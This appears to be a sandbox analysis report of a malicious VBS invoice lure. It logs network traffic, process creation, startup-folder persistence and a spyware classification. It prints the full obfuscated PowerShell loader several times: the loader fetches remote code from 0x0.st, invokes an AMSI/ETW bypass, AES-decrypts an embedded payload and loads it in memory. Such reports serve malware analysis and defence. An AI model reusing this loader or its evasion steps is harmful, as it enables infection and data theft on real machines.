Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox ViewIP Address: 168.119.145.117 168.119.145.117
Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: checkip.dyndns.org
Source: unknownDNS query: name: reallyfreegeoip.org
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 132.226.247.73:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.247.73:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49710 -> 168.119.145.117:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49705 -> 168.119.145.117:443
Source: global trafficHTTP traffic detected: GET /8ZDa.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /8ZDa.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /8ZDa.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /8ZDa.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global trafficDNS traffic detected: DNS query: 0x0.st
Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
Source: powershell.exe, 00000008.00000002.1451631801.0000000004882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.0000000004805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1451631801.00000000048B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1451631801.00000000048A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49712 version: TLS 1.2

System Summary

barindex
Sample has a suspicious name (potential lure to open the executable)
Source: Commercial Invoice Confirmation-1132346.vbsStatic file information: Suspicious name
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: Commercial Invoice Confirmation-1132346.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2509
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2566
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2509Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2566Jump to behavior
Source: classification engineClassification label: mal100.spyw.expl.evad.winVBS@25/14@3/3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmdJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1296:120:WilError_03
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\3h6QL1gQ.batJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); @{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 P
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); @{GUID="1DA87E53-152B-403E-98DC-74D7B4D63D59"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion = '5.1'CLRVersion="4.0"CmdletsToExport= "Format-List", "Format-Custom", "Format-Table", "Format-Wide", "Out-File", "Out-Printer", "Out-String", "Out-GridView", "Get-FormatData", "Export-FormatData", "ConvertFrom-Json", "ConvertTo-Json", "Invoke-RestMethod", "Invoke-WebRequest", "Register-ObjectEvent", "Register-EngineEvent", "Wait-Event", "Get-Event", "Remove-Event", "Get-EventSubscriber", "Unregister-Event", "New-Event", "Add-Member", "Add-Type", "Compare-Object", "ConvertTo-Html", "ConvertFrom-StringData", "Export-Csv", "Import-Csv", "ConvertTo-Csv", "ConvertFrom-Csv", "Export-Alias", "Invoke-Expression", "Get-Alias", "Get-Culture", "Get-Date", "Get-Host", "Get-Member", "Get-Random", "Get-UICulture", "Get-Unique", "Export-PSSession", "Import-PSSession", "Import-Alias", "Import-LocalizedData", "Select-String", "Measure-Object", "New-Alias", "New-TimeSpan", "Read-Host", "Set-Alias", "Set-Date", "Start-Sleep", "Tee-Object", "Measure-Command", "Update-List", "Update-TypeData", "Update-FormatData", "Remove-TypeData", "Get-TypeData", "Write-Host", "Write-Progress", "New-Object", "Select-Object", "Group-Object", "Sort-Object", "Get-Variable", "New-Variable", "Set-Variable", "Remove-Variable", "Clear-Variable", "Export-Clixml", "Import-Clixml", "ConvertTo-Xml", "Select-Xml", "Write-Debug", "Write-Verbose", "Write-Warning", "Write-Error", "Write-Information", "Write-Output", "Set-PSBreakpoint", "Get-PSBreakpoint", "Remove-PSBreakpoint", "Enable-PSBreakpoint", "Disable-PSBreakpoint", "Get-PSCallStack", "Send-MailMessage", "Get-TraceSource", "Set-TraceSource", "Trace-Command", "Show-Command", "Unblock-File", "Get-Runspace", "Debug-Runspace", "Enable-RunspaceDebug", "Disable-RunspaceDebug", "Get-RunspaceDebug", "Wait-Debugger", "ConvertFrom-String", "Convert-String"FunctionsToExport= "Get-FileHash", "New-TemporaryFile", "New-Guid", "Format-Hex", "Import-PowerShellDataFile", "ConvertFrom-SddlString"AliasesToExport= "CFS", "fhx"NestedModules="Microsoft.PowerShell.Commands.Utility.dll","Microsoft.PowerShell.Utility.psm1"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390787'CompatiblePSEditions = @('Desktop')}function Get-FileHash{ [CmdletBinding(DefaultParameterSetName = "Path", HelpURI = "https://go.microsoft.com/fwlink/?LinkId=517145")] param( [Parameter(Man
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Commercial Invoice Confirmation-1132346.vbsVirustotal: Detection: 13%
Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "Jump to behavior
